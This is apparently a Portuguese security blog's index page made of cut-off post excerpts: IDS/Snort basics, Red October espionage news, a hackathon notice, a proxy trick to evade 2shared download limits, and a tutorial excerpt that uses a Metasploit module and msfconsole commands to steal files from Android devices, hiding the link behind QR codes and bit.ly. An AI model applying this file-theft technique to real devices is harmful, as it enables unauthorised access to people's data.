Pode tirar proveito de uma aplicação web vulnerável. Ao utilizar este usuário pode executar software d
Sistema de detecção de intrusão ou IDS, nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real. Um IDS analisa os pacotes que trafegam na rede comparando com assinaturas de ataques.
Os IDS são classificados em dois tipos:
- NIDS (Baseados em Rede) examinam o tráfego de rede, mais detalhes podem ser vistos em:http://www.snort.com.br/comofuncionaids.asp#nids
- HIDS (Baseados em Host) examinam o sistema, mais detalhes podem ser vistos em:http://www.snort.com.br/comofuncionaids.asp#hids
O SNORT
O SNORT é uma ferramenta NIDS desenvolvido por Martin Roesch “open-source” bastante popular por sua flexibilidade nas configurações de regras e constante atualização frente às novas ferramentas de invasão . Outro ponto forte desta ferramenta é o fato de ter o maior cadastro de assinaturas, ser leve, pequeno, fazer escaneamento do micro e verificar anomalias dentro de toda a rede ao qual seu computador pertence.
O código fonte é otimizado, desenvolvido em módulos utilizando linguagem de programação C e, junto, com a documentação, são de domínio público
Todos sabemos como é chato encontrar um bom servidor de download. O host 2shared.com vem se destacando dos demais pelo fato de não pedir autenticação e a velocidade de download não possuir limitação. O único problema é que após uns 4 downloads ele fica bloqueado por algum tempo. Para burlar tal fato é muito simples, basta utilizar um proxy diferente. Para isso é necessário encontrar um proxy com velocidade alta para garantir um download eficiente. Começamos então por buscar um proxy:
- Você pode pesquisar no www.freeproxylists.net ou www.hidemyass.com/proxy-list e buscar u
Pesquisadores de segurança anunciaram na segunda (14 de 02 de 2013) a descoberta uma rede global de ciberespionagem atuando contra centenas de organizações diplomáticas, governamentais e científicas em quase 40 países, incluindo o Brasil - onde pelos menos quatro sistemas foram infectados.
A megaoperação foi chamada de Operação Outubro Vermelho (em homenagem ao filme "Caçada ao Outubro Vermelho") pelos experts da Kaspersky Lab, responsáveis pela descoberta. Segundo a empresa, ela está em ação desde 2007. O esquema utiliza mais de 1 000 módulos distintos, customizados para alvos específicos. Esses componentes são direcionados para alvos como PCs individuais, equipamentos de rede da Cisco, smartphones e até pendrives.
Nesse arrigo estaremos abordando uma técnica de "hackear" os dispositivos moveis
com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit com um auxiliar de sua biblioteca que pode ser encontrada no Sistema operacional BackTrack. Isso pode ser possível quando um dispositivo esta conectado em sua rede local, Mas usaremos o DynDNS que nos da um alcance melhor do ataque, e veremos como ofuscar o endereço através de codigos QR e site que encurtam links como o bit.ly .
Vamos começar!
Roubar arquivos android_htmlfileprovider
A primeira coisa é começar o msfconsole no terminal do backtrack
- root@bt:~# /opt/framework3/msf3/msfconsole
Agora vamos usar um dos módulos auxiliares do Metasploit, que serve exatamente para o nosso objetivo:
- msf > use gather/android_htmlfileprovider
- msf auxiliary(android_htmlfileprovider) >
Agora, vamos ver as opções que oferece o módulo...
- msf auxiliary(android_htmlfileprovider) > show options
- FILES (arquivos do Android que queremos roubar)
- SRVHOST (IP local que estará a espera de conexões)
- SRVPORT (A porta que estará a espera de conexões)
- SSL (ALTERNATIVA - Se queremos usar SSL para negociação da conexão)
- SSLVersion (Se tiver ativado a opção acima, indique a versão do SSL )
- URIPATH (A URI que será utilizada)
No momento , não vamos tocar na opção FILES. Já na opção SRVPORT mudará para 80, uma vez que é a porta http normal, e será mais suspeito se conectar-se a uma outra porta. Além disso URIPATH também vai mudar, que po
1º Concurso Hackathon para programadores, estudantes e demais interessados no desenvolvimento de soluções/aplicativos inovadores ou criar um software que atenda a um fim específico ou projetos livres que sejam inovadores e utilizáveis para telemóveis.
QUANDO: Dia 1 de Marco de 2013 das 9:00H – 21:00H e Dia 2 de Março de 2013 das 9:00H as 16:30H
Onde: Centro de Formação das TDM, sala 111, Maputo - Moçambique.
Porquê: Desenvolver ideias, identificar parceiros, desenvolver aplicações inovadoras de e para Moçambique, ganhar prémios.
Áreas de Enfoque: propostas inovadoras para solucionar problemas críticos enfrentados no nosso país nos sectores de saúde, agricultura, educação, comércio e turismo com recurso a aplicativos de telemóveis.
Queira por favor se cadastrar com antecedência para reservar o seu lugar. O registo pode ser a título individual, mas é aconselhável que seja uma equipa de 2 ou mais. Para a inscrição, por favor, envie os seus dados de contato (nome completo, área de enfoque (saúde, educação, agricultura, comércio, turismo) que deseja registrar-se até o dia 26 de Fevereiro de 2013, para os seguintes endereços de e-mail:
jamo@saisprogramme.com
ou
mulweli@ologa.com
No minimo, compareca !